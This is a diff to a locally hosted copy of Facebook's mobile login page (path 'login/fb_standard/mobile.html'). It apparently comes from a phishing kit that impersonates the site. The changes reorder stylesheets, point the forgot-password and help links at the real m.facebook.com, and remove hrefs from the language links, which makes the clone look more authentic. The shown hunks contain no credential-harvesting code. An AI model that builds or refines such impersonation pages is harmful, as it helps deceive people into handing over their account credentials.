--- a/login/fb_standard/mobile.html
+++ b/login/fb_standard/mobile.html
@@ -8,15 +8,6 @@
       name="viewport"
       content="user-scalable=no,initial-scale=1,maximum-scale=1" />
     <link
-      href="https://static.xx.fbcdn.net/rsrc.php/v3/ya/r/O2aKM2iSbOw.png"
-      rel="shortcut icon"
-      sizes="196x196" />
-    <meta
-      name="referrer"
-      content="origin-when-crossorigin"
-      id="meta_referrer" />
-    <link rel="stylesheet" href="./mobile_files/mobile.css" />
-    <!-- <link
       type="text/css"
       rel="stylesheet"
       href="./mobile_files/Tvjn6wSRfob.css"
@@ -27,7 +18,16 @@
       rel="stylesheet"
       href="./mobile_files/V0Om-DH9YTH.css"
       data-bootloader-hash="gJFto"
-      crossorigin="anonymous" /> -->
+      crossorigin="anonymous" />
+    <link
+      href="https://static.xx.fbcdn.net/rsrc.php/v3/ya/r/O2aKM2iSbOw.png"
+      rel="shortcut icon"
+      sizes="196x196" />
+    <meta
+      name="referrer"
+      content="origin-when-crossorigin"
+      id="meta_referrer" />
+    <link rel="stylesheet" href="./mobile_files/mobile.css" />
     <script id="u_0_i">
       function envFlush(a) {
         function b(b) {
@@ -559,7 +559,7 @@
                           <a
                             class="_9on1"
                             tabindex="0"
-                            href="/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzE0MDg4OTA2LCJjYWxsc2l0ZV9pZCI6Mjg0Nzg1MTQ5MzQ1MzY5fQ%3D%3D&amp;c=https%3A%2F%2Fm.facebook.com%2F&amp;r&amp;cuid&amp;ars=facebook_login&amp;lwv=100&amp;refid=8"
+                            href="https://m.facebook.com/login/identify/?ctx=recover&c=https%3A%2F%2Fm.facebook.com%2F%3Fwtsid%3Drdr_00CGl1UzMG0xyJbu9&multiple_results=0&ars=facebook_login&from_login_screen=0&lwv=100&wtsid=rdr_0CsTKCVW73X7sVoES&_rdr"
                             id="forgot-password-link"
                             >¿Olvidaste tu contraseña?</a
                           >
@@ -629,7 +629,6 @@
                       <div class="_3ztc">
                         <span class="_52jc"
                           ><a
-                            href="https://m.facebook.com/a/language.php?loc=fr_FR&amp;href=https%3A%2F%2Fm.facebook.com%2F&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8"
                             data-ajaxify-href="https://m.facebook.com/a/language.php?loc=fr_FR&amp;href=https%3A%2F%2Fm.facebook.com%2F&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8"
                             data-method="post"
                             data-sigil="ajaxify"
@@ -640,7 +639,6 @@
                       <div class="_3ztc">
                         <span class="_52jc"
                           ><a
-                            href="https://m.facebook.com/a/language.php?loc=de_DE&amp;href=https%3A%2F%2Fm.facebook.com%2F&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8"
                             data-ajaxify-href="https://m.facebook.com/a/language.php?loc=de_DE&amp;href=https%3A%2F%2Fm.facebook.com%2F&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8"
                             data-method="post"
                             data-sigil="ajaxify"
@@ -651,7 +649,6 @@
                       <div class="_3ztc">
                         <span class="_52jc"
                           ><a
-                            href="https://m.facebook.com/a/language.php?loc=ar_AR&amp;href=https%3A%2F%2Fm.facebook.com%2F&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8"
                             data-ajaxify-href="https://m.facebook.com/a/language.php?loc=ar_AR&amp;href=https%3A%2F%2Fm.facebook.com%2F&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8"
                             data-method="post"
                             data-sigil="ajaxify"
@@ -664,7 +661,6 @@
                       <div class="_3ztc">
                         <span class="_52jc"
                           ><a
-                            href="https://m.facebook.com/a/language.php?loc=es_ES&amp;href=https%3A%2F%2Fm.facebook.com%2F&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8"
                             data-ajaxify-href="https://m.facebook.com/a/language.php?loc=es_ES&amp;href=https%3A%2F%2Fm.facebook.com%2F&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8"
                             data-method="post"
                             data-sigil="ajaxify"
@@ -675,7 +671,6 @@
                       <div class="_3ztc">
                         <span class="_52jc"
                           ><a
-                            href="https://m.facebook.com/a/language.php?loc=pt_BR&amp;href=https%3A%2F%2Fm.facebook.com%2F&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8"
                             data-ajaxify-href="https://m.facebook.com/a/language.php?loc=pt_BR&amp;href=https%3A%2F%2Fm.facebook.com%2F&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8"
                             data-method="post"
                             data-sigil="ajaxify"
@@ -686,7 +681,6 @@
                       <div class="_3ztc">
                         <span class="_52jc"
                           ><a
-                            href="https://m.facebook.com/a/language.php?loc=it_IT&amp;href=https%3A%2F%2Fm.facebook.com%2F&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8"
                             data-ajaxify-href="https://m.facebook.com/a/language.php?loc=it_IT&amp;href=https%3A%2F%2Fm.facebook.com%2F&amp;ls_ref=mobile_suggested_locale_selector&amp;refid=8"
                             data-method="post"
                             data-sigil="ajaxify"
@@ -695,7 +689,6 @@
                         >
                       </div>
                       <a
-                        href="/language/?next_uri=https%3A%2F%2Fm.facebook.com%2F&amp;page_style=1&amp;refid=8"
                         ><div
                           class="_3j87 _1rrd _3ztd"
                           aria-label="Complete list of languages"
@@ -714,7 +707,7 @@
                       >About</a
                     ><span aria-hidden="true"> · </span
                     ><a
-                      href="/help/?ref=pf&amp;refid=8"
+                      href="https://m.facebook.com/help/?ref=pf&refid=8"
                       class="_96qw"
                       title="Visit our Help Center."
                       >Help</a
